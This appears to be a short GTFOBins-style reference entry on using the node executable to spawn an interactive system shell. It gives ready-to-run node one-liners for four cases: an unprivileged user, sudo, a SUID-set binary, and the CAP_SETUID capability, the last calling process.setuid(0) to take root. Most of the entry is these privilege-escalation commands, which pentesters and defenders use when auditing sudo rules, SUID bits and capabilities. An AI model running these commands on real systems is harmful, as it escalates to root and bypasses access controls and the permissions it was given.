This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.
The following capabilities are needed:
CAP_SETUID.
node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'